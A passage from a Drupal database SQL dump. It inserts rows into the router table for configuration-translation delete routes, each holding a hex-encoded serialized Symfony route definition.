('config_translation.item.delete.entity.field_config.node_field_edit_form', '/admin/structure/types/manage/{node_type}/fields/{field_config}/translate/{langcode}/delete', '/admin/structure/types/manage/%/fields/%/translate/%/delete', 981, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a39313a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f7b6e6f64655f747970657d2f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a31313a226e6f64655f6669656c6473223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a393a226e6f64655f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3132383a227b5e2f61646d696e2f7374727563747572652f74797065732f6d616e6167652f283f503c6e6f64655f747970653e5b5e2f5d2b2b292f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a373a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f6669656c6473223b7d693a353b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a226e6f64655f74797065223b693a343b623a313b7d693a363b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f74797065732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a393a226e6f64655f74797065223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3938313b733a31343a227061747465726e4f75746c696e65223b733a35393a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f252f6669656c64732f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a31303b7d7d, 10),
('config_translation.item.delete.entity.field_config.taxonomy_term_field_edit_form', '/admin/structure/taxonomy/manage/{taxonomy_vocabulary}/overview/fields/{field_config}/translate/{langcode}/delete', '/admin/structure/taxonomy/manage/%/overview/fields/%/translate/%/delete', 1973, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a3131333a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f7b7461786f6e6f6d795f766f636162756c6172797d2f6f766572766965772f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a32303a227461786f6e6f6d795f7465726d5f6669656c6473223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3135303a227b5e2f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f283f503c7461786f6e6f6d795f766f636162756c6172793e5b5e2f5d2b2b292f6f766572766965772f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a373a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a31363a222f6f766572766965772f6669656c6473223b7d693a353b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a343b623a313b7d693a363b613a323a7b693a303b733a343a2274657874223b693a313b733a33323a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e616765223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31393a227461786f6e6f6d795f766f636162756c617279223b693a313b733a31323a226669656c645f636f6e666967223b693a323b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a313937333b733a31343a227061747465726e4f75746c696e65223b733a37313a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f252f6f766572766965772f6669656c64732f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a31313b7d7d, 11),
('config_translation.item.delete.entity.field_config.user_field_edit_form', '/admin/config/people/accounts/fields/{field_config}/translate/{langcode}/delete', '/admin/config/people/accounts/fields/%/translate/%/delete', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37393a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c64732f7b6669656c645f636f6e6669677d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a31313a22757365725f6669656c6473223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31323a226669656c645f636f6e666967223b613a323a7b733a343a2274797065223b733a31393a22656e746974793a6669656c645f636f6e666967223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31323a226669656c645f636f6e666967223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130363a227b5e2f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c64732f283f503c6669656c645f636f6e6669673e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31323a226669656c645f636f6e666967223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33363a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c6473223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31323a226669656c645f636f6e666967223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a35373a222f61646d696e2f636f6e6669672f70656f706c652f6163636f756e74732f6669656c64732f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.delete.entity.filter_format.edit_form', '/admin/config/content/formats/manage/{filter_format}/translate/{langcode}/delete', '/admin/config/content/formats/manage/%/translate/%/delete', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38303a222f61646d696e2f636f6e6669672f636f6e74656e742f666f726d6174732f6d616e6167652f7b66696c7465725f666f726d61747d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a31333a2266696c7465725f666f726d6174223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31333a2266696c7465725f666f726d6174223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a66696c7465725f666f726d6174223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31333a2266696c7465725f666f726d6174223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130373a227b5e2f61646d696e2f636f6e6669672f636f6e74656e742f666f726d6174732f6d616e6167652f283f503c66696c7465725f666f726d61743e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a2266696c7465725f666f726d6174223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33363a222f61646d696e2f636f6e6669672f636f6e74656e742f666f726d6174732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31333a2266696c7465725f666f726d6174223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a35373a222f61646d696e2f636f6e6669672f636f6e74656e742f666f726d6174732f6d616e6167652f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.delete.entity.image_style.edit_form', '/admin/config/media/image-styles/manage/{image_style}/translate/{langcode}/delete', '/admin/config/media/image-styles/manage/%/translate/%/delete', 501, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38313a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c65732f6d616e6167652f7b696d6167655f7374796c657d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a31313a22696d6167655f7374796c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31313a22696d6167655f7374796c65223b613a323a7b733a343a2274797065223b733a31383a22656e746974793a696d6167655f7374796c65223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31313a22696d6167655f7374796c65223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3130393a227b5e2f61646d696e2f636f6e6669672f6d656469612f696d6167655c2d7374796c65732f6d616e6167652f283f503c696d6167655f7374796c653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a22696d6167655f7374796c65223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a33393a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c65732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31313a22696d6167655f7374796c65223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3530313b733a31343a227061747465726e4f75746c696e65223b733a36303a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c65732f6d616e6167652f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config_translation.item.delete.entity.media_type.edit_form', '/admin/structure/media/manage/{media_type}/translate/{langcode}/delete', '/admin/structure/media/manage/%/translate/%/delete', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a37303a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f7b6d656469615f747970657d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a31303a226d656469615f74797065223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31303a226d656469615f74797065223b613a323a7b733a343a2274797065223b733a31373a22656e746974793a6d656469615f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31303a226d656469615f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39373a227b5e2f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f283f503c6d656469615f747970653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a226d656469615f74797065223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f6d656469612f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31303a226d656469615f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a35303a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.delete.entity.menu.edit_form', '/admin/structure/menu/manage/{menu}/translate/{langcode}/delete', '/admin/structure/menu/manage/%/translate/%/delete', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36333a222f61646d696e2f7374727563747572652f6d656e752f6d616e6167652f7b6d656e757d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a343a226d656e75223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a343a226d656e75223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a6d656e75223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a343a226d656e75223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39303a227b5e2f61646d696e2f7374727563747572652f6d656e752f6d616e6167652f283f503c6d656e753e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a226d656e75223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32383a222f61646d696e2f7374727563747572652f6d656e752f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a343a226d656e75223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a34393a222f61646d696e2f7374727563747572652f6d656e752f6d616e6167652f252f7472616e736c6174652f252f64656c657465223b733a383a226e756d5061727473223b693a383b7d7d, 8);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('config_translation.item.delete.entity.node_type.edit_form', '/admin/structure/types/manage/{node_type}/translate/{langcode}/delete', '/admin/structure/types/manage/%/translate/%/delete', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36393a222f61646d696e2f7374727563747572652f74797065732f6d616e6167652f7b6e6f64655f747970657d2f7472616e736c6174652f7b6c616e67636f64657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35393a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e44656c657465466f726d223b733a393a22706c7567696e5f6964223b733a393a226e6f64655f74797065223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a393a226e6f64655f74797065223b613a323a7b733a343a2274797065223b733a31363a22656e746974793a6e6f64655f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a393a226e6f64655f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a39363a227b5e2f61646d696e2f7374727563747572652f74797065732f6d616e6167652f283f503c6e6f64655f747970653e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a226e6f64655f74797065223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f74797065732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a393a226e6f64655f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f